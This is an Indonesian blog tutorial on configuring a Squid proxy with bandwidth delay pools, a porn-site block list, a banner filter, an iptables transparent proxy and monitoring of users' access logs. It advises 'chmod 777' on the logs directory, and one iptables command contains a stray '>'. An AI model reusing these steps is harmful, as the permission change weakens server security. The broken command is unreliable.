#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwith
#We have two different delay_pools
delay_pools 2
#First delay pool
#W don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
delay_class 1 2
#-1/-1 mean that there are no limits
delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
delay_parameters 2 5000/150000 5000/120000
delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------
"Jika anda tidak menginginkan Limit Bandwith berjalan, maka pada awal script delay poll dalam file squid.conf.hanny harus diberi tanda " # "
#------------------------ DELAY POLL KONFIGURASI HANNY ---------------------------
#This is the most important part for shaping incoming traffic with Squid
#For detailed description see squid.conf file or docs at http://www.squid-cache.org
#We don't want to limit downloads on our local network
#acl magic_words1 url_regex -i 192.168.
#We want to limit downloads of these type of files
#Put this all in one line
acl magic_words2 url_regex -i ftp .exe .mp3 .vqf .tar.gz .gz .rpm .zip .rar .avi .mpeg .mpe .mpg .qt .ram .rm .iso .raw .wav
#We don't block .html, .gif, .jpg and similar files, because they
#generally don't consume much bandwith
#We have two different delay_pools
#delay_pools 2
#First delay pool
#W don't want to delay our local traffic
#There are three pool classes; here we will deal only with the second
#delay_class 1 2
#-1/-1 mean that there are no limits
#delay_parameters 1 -1/-1 -1/-1
#magic_words1: 192.168
#delay_access 1 allow magic_words1
#Second delay pool
#we want to delay downloading files mentioned in magic_words2
#delay_class 2 2
#The numbers here are values in bytes;
#we must remember that Squid doesn't consider start/stop bits
#5000/150000 are values for the whole network
#5000/120000 are values for the single IP
#after downloaded files exceed about 150000 bytes,
#(or even twice or three times as much)
#they will continue to download at about 5000 bytes/s
#delay_parameters 2 5000/150000 5000/120000
#delay_access 2 allow magic_words2
#--------------------------------------------------------------------------------
Merubah nama file squid..conf yang asli dari komputer anda ke nama file lain. (sebagai back-up)
Dan merubah squid.conf.hanny menjadi squid.conf
[root@PROXY etc]# mv squid.conf squid.conf.punyaku
[root@PROXY etc]# mv squid.conf.hanny squid.conf
4. Instalasi Porn Filter
Buatlah terlebih dahulu file dengan nama porn.txt
[root@PROXY etc]# touch porn.txt
Isikan file porn.txt dengan site-site yang hendak anda tutup, misal www.17tahun.com
[root@PROXY etc]# vi porn.txt
isikan dengan kata 17tahun
Menjalankan squid
Memberi hak direktori squid dan bannerfilter agar proses berjalan lancar :
[root@PROXY etc]# chown -R squid.squid /usr/local/squid
[root@PROXY etc]# chown -R squid.squid /usr/local/apache/htdocs/bannerfilter
Aktifkan cache squid anda terlebih dahulu:
[root@PROXY etc]# /usr/local/squid/sbin/squid -z
Jika muncul permission denied pada saat pembuatan cache, cek dulu owner dan permission untuk directory cache :
[root@PROXY etc]# chmod 777 /usr/local/squid/var/logs/
Sampai tahap ini jika ada pesan error mohon email ke hanny@rsds.or.id
Jalankan daemon squid anda :
[root@PROXY etc]# /usr/local/squid/sbin/squid
Cek squid anda apakah jalan atau tidak :
[root@PROXY etc]# netstat -pln | grep squid
tcp 0 0 0.0.0.0 :8080 0.0.0.0:* LISTEN 777/(squid)
udp 0 0 0.0.0.0 :32771 0.0.0.0:* 777/(squid)
udp 0 0 0.0.0.0 :3130 0.0.0.0:* 777/(squid)
Jika keluar seperti hal diatas, maka squid anda telah berjalan !! rokokan dulu ah...: )
Test Squid Dari Komputer Client
Lakukan penge-test ping antar network anda, misal server anda mempunyai ip 192.168.0.1 dan ip windows client anda 192.168.1.2 :
[root@PROXY etc]# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) from 192.168.0.1 : 56(84) bytes of data.
Warning: time of day goes back, taking countermeasures.
64 bytes from 192.168.0.2: icmp_seq=0 ttl=255 time=233 usec
64 bytes from 192.168.0.2: icmp_seq=1 ttl=255 time=161 usec
Jika anda mempunyai client dengan operating system windows 98 atau windows me atau windows XP, pada software internet explorer coba isikan proxy dengan ip server anda dan port 8080 (misal ip server saya 192.168.0.1 maka pengisian proxy adalah 192.168.0.1 : 8080)
Coba anda buka situs-situs berikut ini dalam masing-masing new windows internet explorer :
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com
1. Bila situs http://www.yahoo.com terbuka maka artinya pengerjaan squid anda sampai tahap ini berjalan lancar.
2. Bila situs http://www.17tahun.com tidak terbuka dan hanya bertulisakan ACCESS DENIED maka Porn Firter anda berjalan lancar. Anda bisa menambahkan situs-situs yang ingin anda tutup, dengan meng-edit kembali file porn.txt
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt
3. Bila situs http://zdads.e-media.com tidak berbuka dan hanya bergambar BLOCKED AREA maka Banner Filter anda berjalan lancar.
5. Transparan Proxy
Agar lebih mudah kita akan menggunakan iptables
[root@PROXY hanny]# /sbin/iptables -F -t nat
[root@PROXY hanny]# /sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 > --dport 80 -j DNAT --to 192.168.0.1:8080
keterangan iptables diatas :
1. eth1 adalah interface lancard untuk ip gateway client.
2. 192.168.0.0/255.255.255.0 adalah ip client kita mulai dari 192.168.0.0 sampai 192.168.0.255.
3. --dport 80 -j DNAT --to 192.168.0.1:8080 adalah bila ada request port 80 (biasanya browsing), akan di paksa masuk ke squid dengan ip 192.168.0.1 port 8080.
Jika anda mempunyai client dengan operating system windows 98 atau windows me atau windows XP, pada software internet explorer, pastikan tidak terisi proxy. Dan pastikan pengisian ip client dan ip gateway client anda adalah benar adanya !!!
(Misal ip client saya mempunyai ip 192.168.0.2 dan ip gateway 192.168.0.1)
Coba anda buka situs-situs berikut ini dalam masing-masing new windows internet explorer :
http://www.yahoo.com , http://www.17tahun.com , http://zdads.e-media.com
1. Bila situs http://www.yahoo.com terbuka maka artinya pengerjaan squid anda sampai tahap ini berjalan lancar.
2. Bila situs http://www.17tahun.com tidak terbuka dan hanya bertulisakan ACCESS DENIED maka Porn Firter anda berjalan lancar. Anda bisa menambahkan situs-situs yang ingin anda tutup, dengan meng-edit kembali file porn.txt
[root@PROXY hanny]# vi /usr/local/squid/etc/porn.txt
3. Bila situs http://zdads.e-media.com tidak berbuka dan hanya bergambar BLOCKED AREA maka Banner Filter anda berjalan lancar.
Autorun Squid dan Transparan Proxy
Bila server squid kita restart dan kita tidak ingin mengulangi command2x seperti hal-hal pada artikel di atas, maka masukan script pada /etc/rc.local :
[root@PROXY hanny]# vi /etc/rc.local
isikan dengan :
#Menjalankan Transparan Proxy
/sbin/iptables -F -t nat
/sbin/iptables -t nat -A PREROUTING -i eth1 -p tcp -s 192.168.0.0/255.255.255.0 --dport 80 -j DNAT --to 192.168.0.1:8080
#Menghidupkan Squid
/bin/rm /usr/local/squid/var/logs/squid.pid
/usr/local/squid/sbin/squid
6. Lain-Lain
Bila kita inggin melihat siapa saja yang sedang mengunakan squid kita dan situs-situs apa saja yang mereka buka, anda bisa menggunakan:
[root@PROXY hanny]# tail -f /usr/local/squid/var/logs/access.log
Bila anda merubah isi file squid.conf dan ingin mencoba apakah squid.conf yang kita rubah bisa sesuai yang kita inginkan :
[root@PROXY hanny]# /usr/local/squid/sbin/squid -k reconfigure
7. ChangeLog
24 Maret 2003
Penambahan permission pada direktory cache (dani@bisnisweb.com)
24 Maret 2003
Penulisan tutorial ini dimulai (hanny@rsds.or.id)
8. Referensi
1. http://www.squid-cache.org/
2. http://www.tldp.org/HOWTO/mini/TransparentProxy.html
3. http://jateng.linux.or.id/index.html
4. http://netfilter.samba.org/
5. http://phroggy.com/bannerfilter/
9. Ucapan Terima Kasih
1. Kepada asfik , sunar , dani sebagai awal dari penginstallan squid saya.
2. Kepada channel #indolinux server dal.net dan efnet.net sebagai komunitas linux.
Subscribe to:
Posts (Atom)